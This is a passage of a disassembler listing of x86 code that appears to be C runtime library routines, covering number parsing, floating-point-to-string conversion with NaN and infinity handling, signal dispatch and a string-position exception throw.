jmp loc_428EC1
; ---------------------------------------------------------------------------
loc_428E3C: ; CODE XREF: sub_428B61+65�j
; DATA XREF: seg000:off_428FB8�o
mov [ebp+var_5C], 1 ; jumptable 00428BC6 case 9
xor esi, esi
loc_428E45: ; CODE XREF: sub_428B61+322�j
cmp ds:dword_4437B0, 1
movzx eax, bl
jle short loc_428E5D
push 4
push eax
call sub_422B91
pop ecx
pop ecx
jmp short loc_428E6A
; ---------------------------------------------------------------------------
loc_428E5D: ; CODE XREF: sub_428B61+2EE�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_428E6A: ; CODE XREF: sub_428B61+2FA�j
test eax, eax
jz short loc_428E8A
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_428E85
mov bl, [edi]
inc edi
jmp short loc_428E45
; ---------------------------------------------------------------------------
loc_428E85: ; CODE XREF: sub_428B61+31D�j
mov esi, 1451h
loc_428E8A: ; CODE XREF: sub_428B61+30B�j
mov [ebp+var_54], esi
loc_428E8D: ; CODE XREF: sub_428B61+35C�j
cmp ds:dword_4437B0, 1
movzx eax, bl
jle short loc_428EA5
push 4
push eax
call sub_422B91
pop ecx
pop ecx
jmp short loc_428EB2
; ---------------------------------------------------------------------------
loc_428EA5: ; CODE XREF: sub_428B61+336�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_428EB2: ; CODE XREF: sub_428B61+342�j
test eax, eax
jz loc_428C02
mov bl, [edi]
inc edi
jmp short loc_428E8D
; ---------------------------------------------------------------------------
loc_428EBF: ; CODE XREF: sub_428B61+24E�j
; sub_428B61+2AF�j
mov edi, ecx
loc_428EC1: ; CODE XREF: sub_428B61+A2�j
; sub_428B61+294�j ...
cmp [ebp+var_44], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_428F66
push 18h
pop eax
cmp [ebp+var_34], eax
jbe short loc_428EED
cmp [ebp+var_19], 5
jl short loc_428EE1
inc [ebp+var_19]
loc_428EE1: ; CODE XREF: sub_428B61+37B�j
mov [ebp+var_34], eax
mov eax, [ebp+var_3C]
dec eax
inc [ebp+var_38]
jmp short loc_428EF0
; ---------------------------------------------------------------------------
loc_428EED: ; CODE XREF: sub_428B61+375�j
mov eax, [ebp+var_3C]
loc_428EF0: ; CODE XREF: sub_428B61+38A�j
cmp [ebp+var_34], 0
jbe loc_428F8D
jmp short loc_428F02
; ---------------------------------------------------------------------------
loc_428EFC: ; CODE XREF: sub_428B61+3A5�j
dec [ebp+var_34]
inc [ebp+var_38]
loc_428F02: ; CODE XREF: sub_428B61+399�j
dec eax
cmp byte ptr [eax], 0
jz short loc_428EFC
lea eax, [ebp+var_14]
push eax
push [ebp+var_34]
lea eax, [ebp+var_30]
push eax
call sub_428A83
mov eax, [ebp+var_54]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_4C], ecx
jge short loc_428F27
neg eax
loc_428F27: ; CODE XREF: sub_428B61+3C2�j
add eax, [ebp+var_38]
cmp [ebp+var_5C], ecx
jnz short loc_428F32
add eax, [ebp+arg_10]
loc_428F32: ; CODE XREF: sub_428B61+3CC�j
cmp [ebp+var_58], ecx
jnz short loc_428F3A
sub eax, [ebp+arg_14]
loc_428F3A: ; CODE XREF: sub_428B61+3D4�j
cmp eax, 1450h
jg short loc_428F6F
cmp eax, 0FFFFEBB0h
jl short loc_428F86
push [ebp+arg_C]
push eax
lea eax, [ebp+var_14]
push eax
call sub_42968C
mov edx, [ebp+var_14]
mov ebx, [ebp+var_14+2]
mov esi, [ebp+var_E]
mov eax, [ebp+var_A]
add esp, 0Ch
jmp short loc_428F95
; ---------------------------------------------------------------------------
loc_428F66: ; CODE XREF: sub_428B61+369�j
mov [ebp+var_48], 4
jmp short loc_428F8D
; ---------------------------------------------------------------------------
loc_428F6F: ; CODE XREF: sub_428B61+3DE�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_48], 2
jmp short loc_428F95
; ---------------------------------------------------------------------------
loc_428F86: ; CODE XREF: sub_428B61+3E5�j
mov [ebp+var_48], 1
loc_428F8D: ; CODE XREF: sub_428B61+393�j
; sub_428B61+40C�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_428F95: ; CODE XREF: sub_428B61+403�j
; sub_428B61+423�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_50]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_48]
mov [ecx], dx
mov ecx, [ebp+var_4]
pop esi
pop ebx
call sub_422B83
leave
retn
sub_428B61 endp
; ---------------------------------------------------------------------------
off_428FB8 dd offset loc_428BCD ; DATA XREF: sub_428B61+65�r
dd offset loc_428C1D ; jump table for switch statement
dd offset loc_428C68
dd offset loc_428C92
dd offset loc_428CEB
dd offset loc_428D60
dd offset loc_428D90
dd offset loc_428DDA
dd offset loc_428DB9
dd offset loc_428E3C
dd offset loc_428E2E
dd offset loc_428DFA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428FE8 proc near ; CODE XREF: sub_427FEF+34�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_2C], 1
mov edx, eax
jz short loc_429052
mov byte ptr [ebx+2], 2Dh
jmp short loc_429056
; ---------------------------------------------------------------------------
loc_429052: ; CODE XREF: sub_428FE8+62�j
mov byte ptr [ebx+2], 20h
loc_429056: ; CODE XREF: sub_428FE8+68�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_42906B
test edi, edi
jnz short loc_42906B
cmp [ebp+arg_0], edi
jz loc_42915E
loc_42906B: ; CODE XREF: sub_428FE8+74�j
; sub_428FE8+78�j
cmp dx, si
jnz short loc_4290E8
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_429084
cmp [ebp+arg_0], 0
jz short loc_429093
loc_429084: ; CODE XREF: sub_428FE8+94�j
test edi, 40000000h
jnz short loc_429093
push offset a1Snan ; "1#SNAN"
jmp short loc_4290D9
; ---------------------------------------------------------------------------
loc_429093: ; CODE XREF: sub_428FE8+9A�j
; sub_428FE8+A2�j
test cx, cx
jz short loc_4290AD
cmp edi, 0C0000000h
jnz short loc_4290AD
cmp [ebp+arg_0], 0
jnz short loc_4290D4
push offset a1Ind ; "1#IND"
jmp short loc_4290BC
; ---------------------------------------------------------------------------
loc_4290AD: ; CODE XREF: sub_428FE8+AE�j
; sub_428FE8+B6�j
cmp edi, eax
jnz short loc_4290D4
cmp [ebp+arg_0], 0
jnz short loc_4290D4
push offset a1Inf ; "1#INF"
loc_4290BC: ; CODE XREF: sub_428FE8+C3�j
lea eax, [ebx+4]
push eax
call sub_41EEC0
mov byte ptr [ebx+3], 5
loc_4290C9: ; CODE XREF: sub_428FE8+FE�j
and [ebp+var_2C], 0
pop ecx
pop ecx
jmp loc_429240
; ---------------------------------------------------------------------------
loc_4290D4: ; CODE XREF: sub_428FE8+BC�j
; sub_428FE8+C7�j ...
push offset a1Qnan ; "1#QNAN"
loc_4290D9: ; CODE XREF: sub_428FE8+A9�j
lea eax, [ebx+4]
push eax
call sub_41EEC0
mov byte ptr [ebx+3], 6
jmp short loc_4290C9
; ---------------------------------------------------------------------------
loc_4290E8: ; CODE XREF: sub_428FE8+86�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_10], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_E], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_6], dx
mov [ebp+var_A], edi
call sub_42968C
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_429149
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
inc esi
call sub_42945A
pop ecx
pop ecx
loc_429149: ; CODE XREF: sub_428FE8+14F�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_429167
movsx eax, si
add edi, eax
test edi, edi
jg short loc_429167
loc_42915E: ; CODE XREF: sub_428FE8+7D�j
mov byte ptr [ebx+4], 30h
jmp loc_429261
; ---------------------------------------------------------------------------
loc_429167: ; CODE XREF: sub_428FE8+16B�j
; sub_428FE8+174�j
cmp edi, 15h
jle short loc_42916F
push 15h
pop edi
loc_42916F: ; CODE XREF: sub_428FE8+182�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_8], 8
loc_429185: ; CODE XREF: sub_428FE8+1AA�j
lea eax, [ebp+var_10]
push eax
call sub_428A28
dec [ebp+arg_8]
pop ecx
jnz short loc_429185
test esi, esi
jge short loc_4291AF
neg esi
and esi, 0FFh
jle short loc_4291AF
loc_4291A2: ; CODE XREF: sub_428FE8+1C5�j
lea eax, [ebp+var_10]
push eax
call sub_428A56
dec esi
pop ecx
jnz short loc_4291A2
loc_4291AF: ; CODE XREF: sub_428FE8+1AE�j
; sub_428FE8+1B8�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+var_30], eax
jle short loc_42920C
mov [ebp+arg_8], ecx
loc_4291BF: ; CODE XREF: sub_428FE8+21F�j
lea esi, [ebp+var_10]
lea edi, [ebp+var_28]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_428A28
lea eax, [ebp+var_10]
push eax
call sub_428A28
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4289CA
lea eax, [ebp+var_10]
push eax
call sub_428A28
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+var_30]
add al, 30h
add esp, 14h
inc [ebp+var_30]
dec [ebp+arg_8]
mov [ecx], al
mov byte ptr [ebp+var_6+1], 0
jnz short loc_4291BF
mov eax, [ebp+var_30]
loc_42920C: ; CODE XREF: sub_428FE8+1D2�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_429256
jmp short loc_429223
; ---------------------------------------------------------------------------
loc_42921A: ; CODE XREF: sub_428FE8+23D�j
cmp byte ptr [eax], 39h
jnz short loc_429227
mov byte ptr [eax], 30h
dec eax
loc_429223: ; CODE XREF: sub_428FE8+230�j
cmp eax, ecx
jnb short loc_42921A
loc_429227: ; CODE XREF: sub_428FE8+235�j
cmp eax, ecx
jnb short loc_42922F
inc eax
inc word ptr [ebx]
loc_42922F: ; CODE XREF: sub_428FE8+241�j
inc byte ptr [eax]
loc_429231: ; CODE XREF: sub_428FE8+274�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
mov byte ptr [eax+ebx+4], 0
loc_429240: ; CODE XREF: sub_428FE8+E7�j
mov eax, [ebp+var_2C]
loc_429243: ; CODE XREF: sub_428FE8+28C�j
mov ecx, [ebp+var_4]
pop edi
pop esi
pop ebx
call sub_422B83
leave
retn
; ---------------------------------------------------------------------------
loc_429250: ; CODE XREF: sub_428FE8+270�j
cmp byte ptr [eax], 30h
jnz short loc_42925A
dec eax
loc_429256: ; CODE XREF: sub_428FE8+22E�j
cmp eax, ecx
jnb short loc_429250
loc_42925A: ; CODE XREF: sub_428FE8+26B�j
cmp eax, ecx
jnb short loc_429231
mov byte ptr [ecx], 30h
loc_429261: ; CODE XREF: sub_428FE8+17A�j
and word ptr [ebx], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+5], 0
inc eax
jmp short loc_429243
sub_428FE8 endp
; =============== S U B R O U T I N E =======================================
sub_429276 proc near ; CODE XREF: sub_4292AF+5A�p
mov ecx, ds:dword_443BA0
mov eax, offset dword_443B20
push esi
loc_429282: ; CODE XREF: sub_429276+20�j
cmp [eax+4], edx
jz short loc_429298
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:443B20h[esi*4]
cmp eax, esi
jb short loc_429282
loc_429298: ; CODE XREF: sub_429276+F�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:443B20h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_4292AC
cmp [eax+4], edx
jz short locret_4292AE
loc_4292AC: ; CODE XREF: sub_429276+2F�j
xor eax, eax
locret_4292AE: ; CODE XREF: sub_429276+34�j
retn
sub_429276 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4292AF proc near ; CODE XREF: sub_4254B5+2D78�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_429315
dec eax
dec eax
jz short loc_429307
sub eax, 4
jz short loc_429307
sub eax, 3
jz short loc_429307
sub eax, 4
jz short loc_4292FA
sub eax, 6
jz short loc_4292ED
dec eax
jz short loc_4292E0
or eax, 0FFFFFFFFh
jmp loc_4293D4
; ---------------------------------------------------------------------------
loc_4292E0: ; CODE XREF: sub_4292AF+27�j
mov esi, ds:dword_4E2B7C
mov eax, offset dword_4E2B7C
jmp short loc_429320
; ---------------------------------------------------------------------------
loc_4292ED: ; CODE XREF: sub_4292AF+24�j
mov esi, ds:dword_4E2B78
mov eax, offset dword_4E2B78
jmp short loc_429320
; ---------------------------------------------------------------------------
loc_4292FA: ; CODE XREF: sub_4292AF+1F�j
mov esi, ds:dword_4E2B80
mov eax, offset dword_4E2B80
jmp short loc_429320
; ---------------------------------------------------------------------------
loc_429307: ; CODE XREF: sub_4292AF+10�j
; sub_4292AF+15�j ...
mov edx, edi
call sub_429276
add eax, 8
mov esi, [eax]
jmp short loc_429320
; ---------------------------------------------------------------------------
loc_429315: ; CODE XREF: sub_4292AF+C�j
mov esi, ds:dword_4E2B74
mov eax, offset dword_4E2B74
loc_429320: ; CODE XREF: sub_4292AF+3C�j
; sub_4292AF+49�j ...
cmp esi, 1
jz loc_4293D2
test esi, esi
jnz short loc_429334
push 3
call sub_41F282
loc_429334: ; CODE XREF: sub_4292AF+7C�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_429346
cmp edi, 0Bh
jz short loc_429346
cmp edi, 4
jnz short loc_42936C
loc_429346: ; CODE XREF: sub_4292AF+8B�j
; sub_4292AF+90�j
mov ebx, ds:dword_4E29C4
and ds:dword_4E29C4, 0
cmp edi, ecx
jnz short loc_42939B
mov edx, ds:dword_443BA4
mov [ebp+arg_0], edx
mov ds:dword_443BA4, 8Ch
jmp short loc_42936F
; ---------------------------------------------------------------------------
loc_42936C: ; CODE XREF: sub_4292AF+95�j
mov ebx, [ebp+arg_0]
loc_42936F: ; CODE XREF: sub_4292AF+BB�j
cmp edi, ecx
jnz short loc_42939B
mov eax, ds:dword_443B98
mov ecx, ds:dword_443B9C
add ecx, eax
cmp eax, ecx
jge short loc_4293A2
lea edx, [eax+eax*2]
lea edx, ds:443B28h[edx*4]
sub ecx, eax
loc_429390: ; CODE XREF: sub_4292AF+E8�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_429390
jmp short loc_4293A2
; ---------------------------------------------------------------------------
loc_42939B: ; CODE XREF: sub_4292AF+A6�j
; sub_4292AF+C2�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_4293B0
loc_4293A2: ; CODE XREF: sub_4292AF+D3�j
; sub_4292AF+EA�j
push ds:dword_443BA4
push 8
call esi
pop ecx
pop ecx
jmp short loc_4293BE
; ---------------------------------------------------------------------------
loc_4293B0: ; CODE XREF: sub_4292AF+F1�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_4293BE
cmp edi, 4
jnz short loc_4293D1
loc_4293BE: ; CODE XREF: sub_4292AF+FF�j
; sub_4292AF+108�j
cmp edi, 8
mov ds:dword_4E29C4, ebx
jnz short loc_4293D1
mov eax, [ebp+arg_0]
mov ds:dword_443BA4, eax
loc_4293D1: ; CODE XREF: sub_4292AF+10D�j
; sub_4292AF+118�j
pop ebx
loc_4293D2: ; CODE XREF: sub_4292AF+74�j
xor eax, eax
loc_4293D4: ; CODE XREF: sub_4292AF+2C�j
pop edi
pop esi
pop ebp
retn
sub_4292AF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4293D8 proc near ; CODE XREF: sub_42884D+96�p
; sub_42884D+E4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, ds:dword_4E2B98
push esi
jnb short loc_42944B
mov ecx, eax
and eax, 1Fh
shl eax, 3
sar ecx, 5
lea ecx, ds:4E2BA0h[ecx*4]
mov edx, eax
mov eax, [ecx]
movsx eax, byte ptr [eax+edx+4]
test al, 1
jz short loc_42944B
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_42941F
mov ecx, [ecx]
lea ecx, [ecx+edx+4]
and byte ptr [ecx], 7Fh
jmp short loc_429432
; ---------------------------------------------------------------------------
loc_42941F: ; CODE XREF: sub_4293D8+3A�j
cmp [esp+4+arg_4], 4000h
jnz short loc_42943F
mov ecx, [ecx]
lea ecx, [ecx+edx+4]
or byte ptr [ecx], 80h
loc_429432: ; CODE XREF: sub_4293D8+45�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42943F: ; CODE XREF: sub_4293D8+4F�j
mov ds:dword_4E28F4, 16h
jmp short loc_429455
; ---------------------------------------------------------------------------
loc_42944B: ; CODE XREF: sub_4293D8+B�j
; sub_4293D8+2A�j
mov ds:dword_4E28F4, 9
loc_429455: ; CODE XREF: sub_4293D8+71�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_4293D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42945A proc near ; CODE XREF: sub_428FE8+15A�p
; sub_42968C+6B�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_4437D4
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_429664
cmp cx, 7FFFh
jnb loc_429664
cmp dx, 0BFFDh
ja loc_429664
cmp dx, 3FBFh
ja short loc_4294CD
xor eax, eax
jmp short loc_429507
; ---------------------------------------------------------------------------
loc_4294CD: ; CODE XREF: sub_42945A+6D�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_4294EF
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_4294F1
cmp [esi+4], eax
jnz short loc_4294F1
cmp [esi], eax
jnz short loc_4294F1
jmp loc_42965E
; ---------------------------------------------------------------------------
loc_4294EF: ; CODE XREF: sub_42945A+7B�j
xor eax, eax
loc_4294F1: ; CODE XREF: sub_42945A+85�j
; sub_42945A+8A�j ...
cmp cx, ax
jnz short loc_429514
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_429514
cmp [ebx+4], eax
jnz short loc_429514
cmp [ebx], eax
jnz short loc_429514
loc_429507: ; CODE XREF: sub_42945A+71�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_42967F
; ---------------------------------------------------------------------------
loc_429514: ; CODE XREF: sub_42945A+9A�j
; sub_42945A+A2�j ...
mov [ebp+var_18], eax
lea eax, [ebp+var_C]
mov [ebp+var_14], eax
mov [ebp+arg_4], 5
loc_429524: ; CODE XREF: sub_42945A+12C�j
mov eax, [ebp+var_18]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_429578
add eax, esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_20], ecx
mov [ebp+var_28], eax
loc_429540: ; CODE XREF: sub_42945A+11C�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_24]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_14]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_4289A9
add esp, 0Ch
test eax, eax
jz short loc_42956B
mov eax, [ebp+var_14]
inc word ptr [eax]
loc_42956B: ; CODE XREF: sub_42945A+109�j
add [ebp+var_24], 2
sub [ebp+var_20], 2
dec [ebp+var_28]
jnz short loc_429540
loc_429578: ; CODE XREF: sub_42945A+D3�j
add [ebp+var_14], 2
inc [ebp+var_18]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_429524
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_4295BB
loc_429596: ; CODE XREF: sub_42945A+158�j
test byte ptr [ebp+var_8+3], 80h
jnz short loc_4295B4
lea eax, [ebp+var_10]
push eax
call sub_428A28
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_429596
loc_4295B4: ; CODE XREF: sub_42945A+140�j
cmp word ptr [ebp+arg_0], 0
jg short loc_4295F4
loc_4295BB: ; CODE XREF: sub_42945A+13A�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_4295F4
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_4295D4: ; CODE XREF: sub_42945A+18E�j
test byte ptr [ebp+var_10], 1
jz short loc_4295DD
inc [ebp+var_1C]
loc_4295DD: ; CODE XREF: sub_42945A+17E�j
lea eax, [ebp+var_10]
push eax
call sub_428A56
dec ebx
pop ecx
jnz short loc_4295D4
cmp [ebp+var_1C], 0
jz short loc_4295F4
or byte ptr [ebp+var_10], 1
loc_4295F4: ; CODE XREF: sub_42945A+15F�j
; sub_42945A+16D�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_42960B
mov eax, [ebp+var_10]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_429640
loc_42960B: ; CODE XREF: sub_42945A+1A0�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_42963D
and [ebp+var_10+2], 0
cmp [ebp+var_C+2], 0FFFFFFFFh
jnz short loc_429638
and [ebp+var_C+2], 0
cmp word ptr [ebp+var_8+2], 0FFFFh
jnz short loc_429632
inc [ebp+arg_0]
mov word ptr [ebp+var_8+2], 8000h
jmp short loc_429640
; ---------------------------------------------------------------------------
loc_429632: ; CODE XREF: sub_42945A+1CB�j
inc word ptr [ebp+var_8+2]
jmp short loc_429640
; ---------------------------------------------------------------------------
loc_429638: ; CODE XREF: sub_42945A+1BF�j
inc [ebp+var_C+2]
jmp short loc_429640
; ---------------------------------------------------------------------------
loc_42963D: ; CODE XREF: sub_42945A+1B5�j
inc [ebp+var_10+2]
loc_429640: ; CODE XREF: sub_42945A+1AF�j
; sub_42945A+1D6�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_429664
mov cx, word ptr [ebp+var_10+2]
mov [esi], cx
mov ecx, [ebp+var_C]
mov [esi+2], ecx
mov ecx, [ebp+var_8]
mov [esi+6], ecx
or eax, edi
loc_42965E: ; CODE XREF: sub_42945A+90�j
mov [esi+0Ah], ax
jmp short loc_42967F
; ---------------------------------------------------------------------------
loc_429664: ; CODE XREF: sub_42945A+4C�j
; sub_42945A+57�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_42967F: ; CODE XREF: sub_42945A+B5�j
; sub_42945A+208�j
mov ecx, [ebp+var_4]
pop edi
pop esi
pop ebx
call sub_422B83
leave
retn
sub_42945A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42968C proc near ; CODE XREF: sub_428B61+3EF�p
; sub_428FE8+141�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_4437D4
push ebx
mov ebx, offset dword_443D08
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_429707
jge short loc_4296B7
neg [ebp+arg_4]
mov ebx, offset dword_443E68
sub ebx, 60h
loc_4296B7: ; CODE XREF: sub_42968C+1E�j
cmp [ebp+arg_8], ecx
jnz short loc_4296C2
mov eax, [ebp+arg_0]
mov [eax], cx
loc_4296C2: ; CODE XREF: sub_42968C+2E�j
cmp [ebp+arg_4], ecx
jz short loc_429707
push esi
push edi
loc_4296C9: ; CODE XREF: sub_42968C+77�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_429700
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_4296F3
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_4296F3: ; CODE XREF: sub_42968C+59�j
push esi
push [ebp+arg_0]
call sub_42945A
pop ecx
pop ecx
xor ecx, ecx
loc_429700: ; CODE XREF: sub_42968C+4C�j
cmp [ebp+arg_4], ecx
jnz short loc_4296C9
pop edi
pop esi
loc_429707: ; CODE XREF: sub_42968C+1C�j
; sub_42968C+39�j
mov ecx, [ebp+var_4]
pop ebx
call sub_422B83
leave
retn
sub_42968C endp
; =============== S U B R O U T I N E =======================================
sub_429712 proc near ; CODE XREF: sub_4297E3+25�p
; sub_42987E+25�p
mov eax, offset aDzc ; "¸„§C"
call sub_420364
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
call sub_4299C6
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_43A33C
call sub_40F41A
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_429712 endp
; ---------------------------------------------------------------------------
word_42974E dw 7983h ; DATA XREF: seg001:0043A340�o
; seg001:0043A34C�o ...
dd 4721024h, 0C310418Bh, 0C310418Dh, 6AF18B56h, 8D016A00h
dd 6C70C4Eh, 43A33Ch, 0FE57F4E8h, 5ECE8BFFh, 2A8E9h
db 0
byte_429779 db 56h, 8Bh, 0F1h ; DATA XREF: seg001:off_43A33C�o
dd 0FFFFDBE8h, 2444F6FFh, 7740108h, 671FE856h, 8B59FFFFh
dd 4C25EC6h
db 0
byte_429795 db 56h, 8Bh, 0F1h ; DATA XREF: seg001:off_43A348�o
dword_429798 dd 14E8h, 2444F600h, 7740108h, 6703E856h, 8B59FFFFh, 4C25EC6h
dd 4801C700h, 0E90043A3h, 0FFFFFFA0h
dword_4297BC dd 0E8F18B56h, 14h, 82444F6h, 56077401h, 0FF66DCE8h, 0C68B59FFh
; DATA XREF: seg001:off_43A354�o
dd 4C25Eh, 0A35401C7h, 79E90043h
db 3 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_4297E3 proc near ; CODE XREF: sub_40EFAE+F�p
; sub_40F16A+13�p ...
mov eax, offset aFzc ; "¸ä§C"
call sub_420364
sub esp, 44h
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-28h]
call sub_40F6AF
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_429712
push offset dword_43A748
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_43A354
call sub_420383
int 3 ; Trap to Debugger
sub_4297E3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
